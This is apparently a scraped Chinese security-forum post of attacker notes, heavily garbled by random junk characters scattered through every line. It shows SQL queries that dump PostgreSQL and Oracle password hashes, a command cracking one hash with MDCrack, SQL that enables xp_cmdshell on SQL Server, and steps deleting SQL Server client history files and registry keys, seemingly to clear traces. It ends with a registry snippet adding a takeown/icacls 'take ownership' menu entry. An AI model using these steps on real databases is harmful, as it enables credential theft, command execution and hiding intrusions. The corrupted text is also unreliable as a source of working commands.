select usename, passwd from pg_shadow; $ o% X/ V, P# C; W4 uusename | passwd1 R9 W8 |4 {- n* Z9 F0 b
——————+————————————-2 _. x- N; @8 ]8 l% P4 U0 y" Z. B$ N
testuser | md5fabb6d7172aadfda4753bf0507ed4396; ^6 {$ y' b0 M: l$ X6 ^
use mdcrack to crack these hashes:-% }4 `) I! L& J& O0 ]: X4 ?
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43960 F+ z* t- }: ^; I- X* ^$ R
7 W a' u9 [( j9 Y; c( w' IOracle:-: u w6 D M/ G
select name, password, spare4 from sys.user$ % p! D3 a3 p. p! P8 v: yhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g 9 I; k2 j: ^/ ^( u2 D" E, ?More on Oracle later, i am a bit bored….& q( _$ N: q( I; \* O
# d% C0 }3 L! M& y" [+ N8 m$ i1 \, z # q, R& `- E7 S' b在sql server2005/2008中开启xp_cmdshell ' l. M' L" O% ^9 @-- To allow advanced options to be changed. ' m9 c) `6 q3 {9 m4 j, s; IEXEC sp_configure 'show advanced options', 17 I! t7 }9 K# S9 V7 ?/ s
GO ) h9 R& r& x: A' y; J-- To update the currently configured value for advanced options.6 p8 s7 E3 [2 V" f3 y
RECONFIGURE' M* P3 v3 |. W c* T/ |
GO* @' ^2 K# h. O$ B) q
-- To enable the feature. # F% p }" _9 ~/ Z+ zEXEC sp_configure 'xp_cmdshell', 1 - S# I4 f/ n! q' }# t- q E, A3 sGO# F, {2 ^" O5 z6 P b+ v- B
-- To update the currently configured value for this feature. ' z# n/ e/ A5 D2 G RRECONFIGURE , x0 O+ }4 O$ {% \) d+ NGO & {4 H7 ]! o1 USQL 2008 server日志清除,在清楚前一定要备份。- K4 Z; d/ f3 f3 i
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除: 5 a- N- f! p& N' `X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin - c8 C9 }& O* M# K' i; z5 s7 L' U* B3 k9 f5 G6 g2 H
对于SQL Server 2008以前的版本:: |1 f2 Y2 Y3 t% ~) E
SQL Server 2005: ) c: q/ O- ]' N删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat ; c+ c( ?/ j/ L% M* ySQL Server 2000: 7 C1 x/ B5 g0 g8 _( i) t! ]清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。 . Y& t; |& e5 q* T! b # P& ^% c6 m; s, h+ L本帖最后由 simeon 于 2013-1-3 09:51 编辑 1 S5 q' o) O/ w) _ + w5 i# |7 G+ c1 }0 z# b0 [( h6 @, Y7 u8 S: F
windows 2008 文件权限修改 / E) X! h' X' w% F1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx + d& X; ]7 H1 M+ l3 x, Y2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98 % X; W* z1 Y9 Q! p* ^! J4 | [一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,9 N' Q/ n/ [6 K& {. a2 I
% B4 a+ E1 ^0 t) I6 L' Y$ }2 x9 Z; c
Windows Registry Editor Version 5.002 G/ ]( Y; T6 H6 t- Y) A
[HKEY_CLASSES_ROOT\*\shell\runas] % M. L5 Z4 b" K@="管理员取得所有权"4 h3 g8 B% ~& h+ y0 c, j+ ^
"NoWorkingDirectory"="" 0 {7 z$ L7 [' ~' Y' W, H[HKEY_CLASSES_ROOT\*\shell\runas\command] 5 G* a) ^6 J$ U3 k8 Q# b) }, `@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" 3 x2 ?1 U( o2 t"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"0 ~; J# U" e P! i
[HKEY_CLASSES_ROOT\exefile\shell\runas2]1 O8 |2 l3 r' B) ]9 i! i
@="管理员取得所有权" 5 `8 d3 l7 y+ J2 ?% m! l" _"NoWorkingDirectory"="" / K% l, ^( R7 \0 f2 ?[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]8 a; F+ n; w# {3 H0 h( t1 q- X1 y
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"# B% ?2 ?* l- ~4 v$ A: \
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" 0 y% x: K* S( Y+ U0 |) J 8 a7 C2 x) d. `9 e8 H8 H1 \[HKEY_CLASSES_ROOT\Directory\shell\runas]9 M3 @! E0 n! \% l1 D
@="管理员取得所有权"; Y8 x' g- C* E* C4 o4 Z
"NoWorkingDirectory"="" ' e* n4 G/ M2 k: H2 f[HKEY_CLASSES_ROOT\Directory\shell\runas\command] 5 h4 X( i; u1 c( w, m/ l$ D- x9 D@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"* U; j# z! |" ?4 Z3 Y
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"6 \+ a$ i b2 U# L, v, X6 P